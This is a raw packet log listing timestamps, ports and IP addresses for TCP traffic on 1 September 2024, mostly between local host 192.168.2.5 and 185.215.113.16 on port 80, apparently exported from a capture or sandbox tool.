Sep 1, 2024 06:28:11.368082047 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.368093014 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.368112087 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.368112087 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.368136883 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.389869928 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.389889956 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.389900923 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.389910936 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.389924049 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.389925957 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.389934063 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.389946938 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.389949083 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390026093 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390146971 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390157938 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390167952 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390177965 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390211105 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390211105 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390384912 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390394926 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390405893 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390418053 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390420914 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390470028 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390470028 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390639067 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390650034 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390660048 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390671968 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390696049 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390696049 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390774012 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390876055 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390887022 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390897036 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.390938044 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.390938044 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.423585892 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:11.448309898 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448326111 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448338032 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448364019 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.448375940 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.448401928 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448414087 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448424101 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448437929 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448467016 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.448467016 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.448508978 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.448602915 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448652029 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.448658943 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448721886 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.448748112 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448759079 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448770046 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.448812008 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.448822021 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449079990 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449090958 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449106932 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449141979 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449141979 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449188948 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449198961 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449234009 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449405909 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449417114 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449428082 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449440002 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449451923 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449457884 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449496031 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449525118 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449760914 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449825048 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449826002 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449836016 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449852943 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449867010 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449870110 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449893951 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449924946 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.449973106 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449984074 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.449995041 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450005054 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450016975 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450025082 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450027943 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450047016 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450076103 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450258017 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450274944 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450309992 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450311899 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450311899 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450321913 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450333118 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450345039 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450351000 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450378895 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450378895 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450530052 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450555086 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450568914 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450575113 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450582027 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450594902 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450599909 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450601101 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450612068 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450629950 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450629950 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450658083 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.450978994 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450989008 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.450999975 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451019049 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451026917 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.451031923 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451041937 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451055050 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451071024 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451073885 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.451075077 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.451097965 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.451145887 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.451335907 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451347113 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451371908 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451383114 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.451385975 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451399088 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451411963 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451412916 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.451425076 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.451447964 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.451447964 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.451477051 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.456804037 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.456850052 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.456902981 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.456913948 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.456963062 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.456963062 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.456979036 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.456990004 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457000017 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457014084 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457020044 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457046032 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457071066 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457159996 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457170963 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457181931 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457195997 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457209110 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457226038 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457248926 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457514048 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457524061 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457535982 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457550049 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457568884 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457590103 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457659960 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457670927 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457681894 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457695007 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457695961 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.457722902 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457722902 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.457747936 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.468494892 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:11.507529020 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.507551908 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.507565975 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.507577896 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.507592916 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.507592916 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.507683039 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.507693052 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.507704973 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.507720947 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.507744074 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.508091927 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508136034 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.508198023 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508208036 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508261919 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.508291006 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508306026 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508316994 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508330107 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508341074 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508348942 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.508361101 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.508393049 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.508502960 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508512020 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508522034 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508534908 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508546114 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508548975 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.508557081 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508573055 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508577108 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.508599043 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.508708000 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.508795977 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508805990 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.508846045 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509047985 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509087086 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509134054 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509146929 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509159088 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509166002 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509171009 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509183884 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509191036 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509196043 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509234905 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509259939 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509661913 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509673119 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509682894 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509692907 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509706020 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509711027 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509716988 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509728909 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509740114 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509742022 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509753942 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509764910 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509764910 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509768009 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509779930 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509794950 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509829998 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509929895 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509941101 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509951115 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.509978056 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.509989977 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.539042950 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539108038 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539118052 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539238930 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539249897 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539261103 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539268970 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.539273024 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539300919 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.539300919 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.539524078 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539572954 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539585114 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539594889 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539613962 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.539613962 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.539645910 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.539814949 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539827108 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539838076 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539846897 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.539901972 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.539902925 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.540093899 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540148020 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540158987 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540169001 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540230989 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540241957 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540251970 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540256023 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.540265083 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540273905 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.540296078 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.540333986 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.540496111 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540508032 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540518045 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540528059 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540539026 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540553093 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540563107 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.540574074 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.540574074 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.540604115 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541450977 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541460991 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541480064 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541490078 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541503906 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541520119 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541521072 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541522980 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541536093 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541543961 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541548967 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541565895 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541577101 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541579008 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541589975 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541604996 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541640043 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541640043 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541645050 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541656017 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541667938 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541671991 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541681051 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541690111 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541693926 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541707993 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541737080 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541821003 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541832924 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541846037 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541857004 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541868925 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.541888952 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.541919947 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.542102098 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.542115927 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.542155027 CEST	80	49711	185.215.113.16	192.168.2.5
